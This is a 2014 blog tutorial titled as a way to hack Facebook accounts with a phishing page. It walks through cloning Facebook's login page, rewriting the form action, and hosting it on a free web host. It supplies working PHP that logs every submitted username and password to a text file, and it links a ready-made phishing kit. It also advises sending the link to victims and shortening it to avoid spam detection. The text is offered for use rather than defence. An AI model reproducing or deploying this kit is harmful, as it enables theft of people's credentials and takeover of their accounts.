Wednesday, 26 February 2014

How to Hack Facebook Account with Phishing Page

phishing:

Phishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging,and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents includelegislation, user training, public awareness, and technical security measures.

today we create a facebook phishing page which look similar to a facebook page but it's not actually a facebook page,when victim enter his username and password you will be able to see that.Interesting.....



Steps to create a phishing page:

1.       Go to the Facebook page ,and then right click on the page, u will see the option view source                 page,click on that.



2.      Now a new tab will open which contain a source code,Select all the stuff and paste it in a                     notepad.
3.      Now open the notepad and press CTRL+F,and type ACTION.


4.       You will have to find a text which looks like ..
                                       action="https://www.facebook.com/login.php?login_attempt=1"

5.        delete all the text written in red colour and instead of it write post.php.then it will look like...

                                                 action="post.php"

6.       Now save it on your desktop with the name index.htm,not index.html,remember.

7.       Now your phishing page is ready.it will look like a pic given below .

                                                                     index

                                                  
8.        Open a new notepad and save the given data with the name post.php.

<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

9.         You have two files now one is index.htm and another is post.php,remember file extension is                 important.

10.       Now u have to upload it in a web hosting site ,i prefer u to use www.000webhost.com or else            www.my3gb.com.

11.      I prefer u to use 000webhost because it will be easy to use.


12.          You have to make a account in that ,after that it looks like a picture given below.


13.      Now go control panel, then on file manager.

14.     After that a new window will pop up.Now go to public_html.



15.       Delete the file named default.php,after that upload two files index.htm and post.php one by one.


16.        Now the last step click on view of index.htm it will look same as facebook page.

This is your Facebook phishing page.
                                       

17.          Copy the url of that page and send this link to your victim,when your victim try to login in to                it with the username and password .the page redirectly connect to facebook. and you will be                now able to see his password.

18.          Open your 000webhost account and go to file manager then public_html,here you find a new               file named username.txt.


19.       Click on view now u will have your friend's password and email id.


20.        This is a simple trick to hack any Facebook password account by phishing page.

21.         If you are not able to create a phishing page then i will provide u a video tutorial link,look
              in to the description of that video u will find a prepared module of phishing pages,download 
              it and enjoy.

                                                                                or

directly download phishing page from below n just upload on an domain n enjoy  

1) Here, I take Facebook as my Fake Page to hack Facebook ID's
2) Download Facebook Phishing page from here :http://www.mediafire.com/download/ch8eat3o6wqtxwf/Fb+Phisher+by+Hackw0rm.zip
3) Create free a/c on 000webhost.com or another webhost and get free domain
4) Here, I had already created one a/c for tutorial
5) After creating free a/c and domain go to your Control panel > and Click on File Manager
6) If it will ask for password, then provide your Password
7) And then go in public_html folder and delete default.php file
After deleting default file, click on upload and you will be redirected to this page
9) I suggest you to use ZIP archives to upload it's fast and easy , so click on choose file
and select ZIP file you downloaded it step 2.
10) After uploading your Phishing page you will see this page
11) So after all type your Domain name in Address bar hit enter and you'll get fake fb login page.
12) And now copy the Address of this page and Go to Google URL Shortener and
Shortern your URL to make your victim's Fool and not to detect as SPAM
13) Let's check whether our Phishing page is working or not ? Go on your Phishing page
and Enter any fake ID and Password in E-mail and Password BOX 
14) After providing your fake info click on login and you will be redirected to original fb login page
and victim E-mail ID and Password will be logged.
15) How to know the Password ? Again Go to your 000webhost dashboard and
over there you will see anotther file manager 
16) Go in Another file manager > public_html > After Entering in public_html folder
you will see this 4 files 
17) Double click on log.txt file and download it after all open it !! hahahaha !!
WOW !! Here you can see how Phishing attack works and steal FB password. Enjoy

No comments:

Post a Comment